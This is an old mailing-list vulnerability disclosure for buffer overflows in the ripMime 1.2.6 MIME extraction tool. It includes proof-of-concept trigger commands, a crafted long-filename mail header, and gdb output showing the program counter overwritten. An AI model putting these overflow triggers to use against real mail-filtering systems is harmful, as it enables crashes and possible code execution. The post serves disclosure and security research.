ripMime mail filter remote / local overflows. At least version 1.2.6
vendor: http://www.pldaniels.com/ripmime/
Details:
CHANGELOG - 15/11/2001 - 20H57 - v1.2.7 Corrected buffer overflow problems with exceptionally long file names. Corrected filename
length problems with OS level fread/write calls.

FreeBSD/ports/mail/ripmime/pkg-descr
 The FreeBSD Ports Collection ("mail/ripmime")
 You are now in the directory for the port "mail/ripmime" (package name "ripmime-1.2.4").
 This is the one-line description for this port:
 Extracts attached files out of a MIME encoded email package

Based on the above info ripmime is part of the FreeBSD ports collection as far as I can tell...
I am not totally sure what it is used for becasue its poster application is Commercial and I
do not have a copy of the software "XaMime". I do know however that somehow it interfaces with
sendmail to strip attachments or filter their content. I have been able to cause a core dump via
2 methods one requires no user intervention and can be done remotely, however it does not yeild
an overwrite of the eip. The second method which I explain below could yeild a shell under some
circumstances perhaps locally, again I do not know what the full potential use of ripmime is.

One possible use is in the above mentioned Commercial application located at:
XaMime | Examine your e-mails
XaMime Mail and Virusfilter
URL: http://www.xamime.de/ or http://www.xamime.com
It is some sort of commercial solution for email filtering.

ripMime also comes as part of the inflex package used for filtering virii from attachments etc on unix boxen.
http://www.spyda.co.za/inflex/mainpage.html or http://www.pldaniels.com/inflex/

Here is an example of the issues at hand
./ripmime -i mail -d `perl -e 'print "A" x 255'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.Segmentation fault

We are using a standard mail file with an incorrect header particularly the BASE64 filename
Content-Type: application/octet-stream;
 name="blah"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename=AAAAAAAAAAAAAAAAAAA....<2000 total chars>

lets look at this more indepth using gdb.
(gdb) r -i mail -d `perl -e 'print "A" x 79'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'print "A" x 79'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.
Program received signal SIGILL, Illegal instruction.
0x4141415c in ?? ()

one more A and we have full eip overwrite. 2079 chars total overwrites the eip

we smashed alot of stuff on the way.

r0 0x4141415f 1094795615
r19 0x41414141 1094795585
r20 0x41414141 1094795585
r21 0x41414141 1094795585
r22 0x41414141 1094795585
r23 0x41414141 1094795585
r24 0x41414141 1094795585
r25 0x41414141 1094795585
r26 0x41414141 1094795585
r27 0x41414141 1094795585
r28 0x41414141 1094795585
r29 0x41414141 1094795585
r30 0x41414141 1094795585
r31 0x41414141 1094795585
pc 0x4141415c 1094795612
lr 0x4141415f 1094795615

I need to investigate methods of changing defaultdir besides the commandline -d option to take advantage of this one.
But of course there are also several other overflows to play with. Once I perfect the remote stuff I will mail out
another update. I just didn't want to get caught sleeping again like I did on namazu.cgi. Oh yeah this is NOT
limited to BASE64 encoded files... have fun.

-KF

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]